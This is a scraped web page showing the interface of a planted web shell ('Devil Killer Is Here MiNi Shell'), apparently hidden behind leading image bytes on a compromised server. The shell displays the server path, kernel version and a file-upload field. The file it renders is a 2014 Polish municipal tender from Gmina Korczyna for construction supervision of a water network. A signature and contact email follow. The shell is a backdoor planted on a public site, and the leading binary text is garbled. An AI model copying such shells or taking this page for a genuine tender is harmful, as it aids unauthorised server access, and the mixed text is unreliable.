JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140110/5967-N-2014.html

<p class="kh_header"><b>Korczyna: Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania
pn. Budowa sieci wodociągowej wraz z przyłączami do budynków w miejscowości Kombornia, Iskrzynia, Wola Komborska.</b><br>
<b>Numer ogłoszenia: 5967 - 2014; data zamieszczenia: 10.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Korczyna , ul. Rynek 18a, 38-420 Korczyna, woj. podkarpackie, tel. 013 4354080, faks 013 4354096.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> korczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania
pn. Budowa sieci wodociągowej wraz z przyłączami do budynków w miejscowości Kombornia, Iskrzynia, Wola Komborska..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania  pn. Budowa sieci wodociągowej wraz z przyłączami do budynków  w  miejscowości Kombornia, Iskrzynia, Wola Komborska.
2. Zakres robót :
 1)  sieć wodociągowa z rur polietylenowych HDPE100 DN160 SDR11,
 2)  sieć wodociągowa z rur polietylenowych HDPE100 DN125 SDR11,
 3)  sieć wodociągowa z rur polietylenowych HDPE100 DN90 SDR11, 
 4)  sieć  wodociągowa z rur polietylenowych HDPE100 DN63 SDR11 (sieć + przyłącza),
 5)  sieć wodociągowa z rur polietylenowych HDPE100 DN40 SDR11,
 6)  hydrant ppoż. DN80 podziemny,
 7)  zawór dwustopniowy napowietrzająco-odpowietrzający,
 8)  studnia z reduktorem ciśnienia DN1500,
 9)  studnia z punktem czerpalnym DN1200, 
10) stacja podnoszenia ciśnienia - podziemna,
11) stacja podnoszenia ciśnienia - kontenerowa,   
12) wykonanie przyłączy do budynków  wraz z konsolą wodomierzową. 
 
3. Szczegółowy zakres robót budowlanych, nad którymi będzie sprawowany nadzór, określają  dokumentacja projektowa, przedmiar robót oraz  specyfikacja techniczna wykonania i odbioru robót budowlanych. Dokumenty te są udostępnione na stronie internetowej Zamawiającego  www.korczyna.pl zakładka przetargi w ramach postępowania na roboty budowlane Budowa sieci wodociągowej wraz z przyłączami do budynków w miejscowości Kombornia, Iskrzynia, Wola Komborska, Nr ZPP. 271.24.2013.
4. Zakres działań i czynności inspektora nadzoru inwestorskiego.
Do obowiązków inspektora/inspektorów należeć będzie pełny zakres czynności określony przepisami ustawy z dnia 7 lipca 1994r. - Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późniejszymi zmianami) w zakresie robót budowlanych wymienionych w pkt. 3.3.  SIWZ a w szczególności :  
1) 	reprezentowanie Inwestora na budowie poprzez sprawowanie kontroli zgodności realizacji inwestycji z projektem budowlanym i wykonawczym, pozwoleniem na budowę, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, postanowieniami umowy zawartej przez Zamawiającego z wykonawcą robót oraz aktualnie dostępną wiedzą techniczną, sztuką budowlaną, prawem obowiązującym w tym zakresie, a w szczególności Prawem budowlanym, Polskimi i Europejskimi Normami,
2)  sprawdzaniu posiadania przez kierownika budowy odpowiednich dokumentów atestów, świadectw jakości, wyników badań itp.) dotyczących dostarczonych elementów, materiałów, urządzeń i innych wyrobów oraz dokonania ich oceny jakości na placu budowy przed ich wbudowaniem,  
3) 	potwierdzanie faktyczne  wykonywanych robót  oraz usunięcia wad oraz kontrolowanie rozliczeń budowy, 
4)  wydawanie kierownikowi budowy lub kierownikowi robót polecenia, potwierdzone wpisem do dziennika budowy, dotyczące: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych,
5)  żądanie od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownie wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku gdyby ich kontynuacja mogła  wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem,
6) bieżąca współpraca z zleceniodawcą w zakresie prawidłowej realizacji zadania inwestycyjnego,
7)  sprawdzanie i weryfikowanie kosztorysów na roboty dodatkowe w okresie trwania umowy z wykonawcą, po wcześniejszym uzgodnieniu z Zamawiającym protokołu konieczności wykonania wymienionych robót,
8)   sporządzanie, z udziałem kierowników robót, protokołów ustaleń z konieczności wykonania robót zamiennych oraz sprawdzanie i weryfikowanie kosztorysów na roboty zamienne, 
9)  kontrola i nadzór nad przestrzeganiem na budowie przepisów BHP, p.poż. i ochrony środowiska,
10)  wskazywanie i zgłaszanie Zamawiającemu ewentualnych braków, usterek, wad i nieprawidłowości w wykonywanych robotach budowlanych, proponowanie sposobu i terminu ich usunięcia oraz nadzór i potwierdzanie ich wykonania,
11)  uczestnictwo w radach budowy, w naradach koordynacyjnych oraz pracach komisji powoływanych przez Zamawiającego, 
12)  nadzór nad dotrzymywaniem terminów wykonania robót budowlanych ustalonych w harmonogramie budowy oraz akceptacja zmian harmonogramu,
13)  współuczestniczenie z Zamawiającym i wykonawcą inwestycji w przeprowadzanych przez służby zewnętrzne i nadzór budowlany kontrolach obiektów poprzedzających uzyskanie decyzji pozwolenia na użytkowanie,
14)   współpraca z Zamawiającym w zakresie uzyskania pozwolenia na użytkowanie wybudowanej sieci,
15)   nadzór nad robotami związanymi z usuwaniem wad i usterek oraz uczestnictwo w odbiorach robót związanych z usunięciem wad i usterek,
16)  uczestnictwo w przeglądach gwarancyjnych obiektów w okresie udzielonej przez (Wykonawcę), 
36-miesięcznej gwarancji, nadzór nad usuwaniem wad i usterek w okresie gwarancyjnym oraz odbiór usunięcia wad i usterek potwierdzony protokołem odbioru, 
17)  opracowywanie niezbędnych sprawozdań i udzielanie informacji z postępu robót,
18)  współdziałanie z projektantem w czasie trwania realizacji przedmiotu umowy celem rozwiązywania bieżących problemów realizacyjnych, w tym sprawowanie nadzoru w zakresie ewentualnych zmian od zatwierdzonego projektu budowlanego oraz weryfikacja  i zatwierdzanie oferowanych przez Wykonawcę materiałów, urządzeń równoważnych,
19)  udział przy opracowaniu raportów, sprawozdań okresowych, wniosków o płatność o ile zajdzie taka konieczność,
20)  uczestnictwo przy przeprowadzaniu prób, pomiarów i sprawdzeń itp.
21)  wykonywaniu czynności związanych z przygotowywaniem zrealizowanej inwestycji do odbioru, dokonaniem odbioru i przekazaniem Zamawiającemu,
22)  W ramach czynności o których mowa w ppkt 21) inspektor nadzoru zobowiązany jest w szczególności do: stwierdzenia gotowości do odbioru elementów ulegających zakryciu oraz dokonanie odbiorów robót budowlanych od wykonawcy robót oraz przekazanie inwestycji zamawiającemu; nadzór nad wykonawcą robót w zakresie powiadomienia stosownych organów (zgodnie z właściwością wynikającą z przepisów szczególnych) o zakończeniu budowy, w szczególności nadzór nad terminowym złożeniem dokumentów w organie nadzoru budowlanego celem uzyskania decyzji  o pozwoleniu na użytkowanie,
23)  sprawowaniu nadzoru oraz weryfikacja dokumentacji powykonawczej (inwentaryzacja powykonawcza, atesty, próby, gwarancje jakości, analiza laboratoryjna wody, uzyskanie pozytywnego sprawozdania z badań wody stwierdzające, że woda nadaje się do spożycia przez ludzi oraz innych dokumentów wymaganych przepisami prawa).Ww. dokumentację inspektor zobowiązany jest potwierdzić własnoręcznym podpisem.
24)  pomoc merytoryczna zamawiającemu z tytułu gwarancji/ rękojmi za wady wykonanej inwestycji, dochodzeniu oraz egzekwowaniu od wykonawcy robót, z którym  zawarta była umowa, należnych odszkodowań lub kar umownych  za nienależyte lub nieterminowe wykonanie zobowiązań umownych,
25)  udział w pierwszym oraz kolejnych przeglądach w okresie gwarancji/rękojmi za wady.
Z przeprowadzonego przeglądu Inspektor nadzoru sporządzi protokół, w którym wyszczególni ewentualne wady i usterki, określi termin ich usunięcia oraz zapewni stosowny nadzór nad tymi robotami,
26)  stałej konsultacji w doradztwie fachowym na rzecz zamawiającego, aż do chwili rozliczenia finansowego projektu z Instytucją Zarządzającą RPOWP na lata 2007-2013,
27)  kontrola, weryfikacja i zatwierdzanie kosztorysów powykonawczych (gdy będą wymagane do rozliczeń związanych z dofinansowaniem z Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego),
28)  Zakres prac, za które odpowiedzialny będzie inspektor nadzoru obejmuje także przygotowanie
 i dostarczenie zamawiającemu wszelkich informacji związanych  z inwestycją, wymaganych przez Instytucję Zarządzającą RPOWP na lata 2007-2013,
29) udział w rozliczeniu finansowym zadania, w tym przygotowanie zestawienia poniesionych wydatków w formie papierowej i elektronicznej, 
30) 	wykonywanie innych czynności wynikających z przepisów ustawy Prawo budowlane oraz odpowiednich aktów wykonawczych, poleceń Zamawiającego oraz tych, które wynikają z nadzoru autorskiego (uzgodnionych z Zamawiającym).

Rozpoczęcie pełnienia nadzoru inwestorskiego - od dnia podpisania umowy, nie później jednak jak od dnia przejęcia terenu budowy przez Wykonawcę robót budowlanych.

Obecność na terenie inwestycji zgodnie z potrzebami wynikającymi z harmonogramu budowy w stopniu zapewniającym skuteczność czynności nadzoru inwestorskiego, a w razie pilnej potrzeby na każde wezwanie Zamawiającego lub kierowników robót Wykonawcy. Należy przyjąć minimum 2 pobyty tygodniowo na placu budowy potwierdzone wpisem do dziennika budowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna powyższy warunek za spełniony o ile wykonawca wykaże wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwie usługi w zakresie pełnienia funkcji inspektora nadzoru robót budowlanych, z których każda swym zakresem obejmowała budowę sieci wodociągowej o śr. od 40 mm do 160 mm i długości min. 20 000mb. 
W przypadku oferty wspólnej wykonawców warunek wiedzy i doświadczenia musi spełniać przynajmniej jeden z wykonawców.
2. W celu wykazania spełniania warunku wykonawca zobowiązany jest złożyć:
a) wykaz usług z podaniem ich  wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane,
b) dowody  potwierdzające czy usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, o ile Wykonawca wykaże, iż dysponuje co najmniej: 
a)  jedną osobą posiadającą uprawnienia budowlane bez ograniczeń do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjno-inżynieryjnej w zakresie zewnętrznych sieci wodociągowo-kanalizacyjnych  i posiadającą:
 -  wykształcenie wyższe techniczne, 
 -  co najmniej 3 letnie doświadczenie zawodowe w sprawowaniu nadzoru nad zakończonymi robotami budowlanymi z zakresu gospodarki wodnej, na co najmniej dwóch  inwestycjach  z zakresu gospodarki wodnej  o długości  (każda ) sieci wodociągowej co najmniej 20 000mb,
b) jedną osobą posiadającą uprawnienia budowlane bez ograniczeń do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności  konstrukcyjno-budowlanej i posiadającą:
  -  wykształcenie wyższe techniczne,
  -  co najmniej 3 letnie doświadczenie zawodowe w  nadzorowaniu robót konstrukcyjno-budowlanych na dwóch zakończonych obiektach kubaturowych,
c)  jedną osobą posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i posiadającą:
 -  wykształcenie wyższe techniczne,
 -  co najmniej 3 letnie doświadczenie zawodowe w nadzorowaniu robót  budowlanych  w branży elektrycznej, na co najmniej dwóch zakończonych inwestycjach gdzie wykorzystano podobne do przedmiotu  zamówienia rozwiązania techniczne z zakresu elektryki i automatyki.  
W celu wykazania spełniania warunku wykonawca zobowiązany jest:
 a) złożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności,
 b)  złożyć oświadczenie stwierdzające, iż osoby/ ba  wymienione/ na w wykazie posiadają /da wymagane  przez Zamawiającego uprawnienia,
 c)  podać informację o podstawie dysponowania osobami/ bą ujętymi/ tą w wykazie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy podsiadają ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 1 000 000zł.
Ocena spełniania warunku zostanie dokonana na podstawie złożonego dokumentu tj. opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>warunki zmian określono w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.korczyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Korczyna
38-420 Korczyna ul. Rynek 18a, pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2014 godzina 09:30, miejsce: Urząd Gminy Korczyna
38-420 Korczyna ul. Rynek 18a, pokój nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowanej jest z Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com